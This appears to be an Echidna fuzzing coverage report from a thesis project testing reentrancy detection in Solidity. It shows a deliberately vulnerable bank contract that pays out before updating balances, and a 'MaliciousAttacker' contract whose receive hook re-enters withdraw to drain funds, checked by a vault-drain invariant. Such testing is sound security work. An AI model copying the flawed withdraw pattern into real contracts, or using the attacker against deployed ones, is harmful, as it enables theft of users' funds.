/home/ali/TFG/pruebas-echidna/contracts/VulnerableBank.sol
  1 |     | // SPDX-License-Identifier: MIT
  2 |     | pragma solidity ^0.8.0;
  3 |     | 
  4 | *   | contract VulnerableBank {
  5 |     |     mapping(address => uint256) public balances;
  6 |     | 
  7 | *   |     function deposit() public payable {
  8 | *   |         balances[msg.sender] += msg.value;
  9 |     |     }
 10 |     | 
 11 | *   |     function withdraw() public {
 12 | *   |         uint256 bal = balances[msg.sender];
 13 | *   |         require(bal > 0);
 14 |     | 
 15 |     |         // Vulnerabilidad: Llamada externa antes de actualizar estado
 16 | *   |         (bool sent, ) = msg.sender.call{value: bal}("");
 17 | *   |         require(sent, "Failed to send Ether");
 18 |     | 
 19 | *   |         balances[msg.sender] = 0;
 20 |     |     }
 21 |     | }

/home/ali/TFG/pruebas-echidna/echidna/ReentrancyEchidnaTest.sol
  1 |     | // SPDX-License-Identifier: MIT
  2 |     | pragma solidity ^0.8.13;
  3 |     | 
  4 |     | import "../contracts/VulnerableBank.sol";
  5 |     | 
  6 |     | contract MaliciousAttacker {
  7 |     |     VulnerableBank public target;
  8 |     |     bool internal isReentering;
  9 |     | 
 10 | *   |     constructor(VulnerableBank _target) {
 11 | *   |         target = _target;
 12 |     |     }
 13 |     | 
 14 |     |     // El motor corregido: necesita recibir ether para reenviar
 15 |     |     receive() external payable {
 16 | *   |         if (address(target).balance >= msg.value && !isReentering) {
 17 |     |             isReentering = true;
 18 |     |             target.withdraw(); 
 19 |     |         }
 20 |     |     }
 21 |     | 
 22 | *   |     function attack() public payable {
 23 | *   |         isReentering = false;
 24 |     |         // Usamos 1 ether para el ataque de reentrada
 25 | *   |         uint256 amount = 1 ether; 
 26 | *   |         if(address(this).balance >= amount) {
 27 | *   |             target.deposit{value: amount}();
 28 | *   |             target.withdraw();
 29 |     |         }
 30 |     |     }
 31 |     | }
 32 |     | 
 33 | *r  | contract ReentrancyEchidnaTest is MaliciousAttacker {
 34 | *   |     constructor() MaliciousAttacker(new VulnerableBank()) payable {
 35 |     |         // IMPORTANTE: El banco necesita tener dinero previo para ser "robable"
 36 |     |         // Simulamos que otros usuarios han depositado 10 ether
 37 | *   |         target.deposit{value: 10 ether}();
 38 |     |     }
 39 |     | 
 40 |     |     // Esta invariante fallará si el balance del banco baja de los 10 ether iniciales
 41 |     |     // debido a una extracción maliciosa.
 42 |     |     function echidna_test_vault_never_drained() public view returns (bool) {
 43 |     |         return address(target).balance >= 10 ether;
 44 |     |     }
 45 |     | }

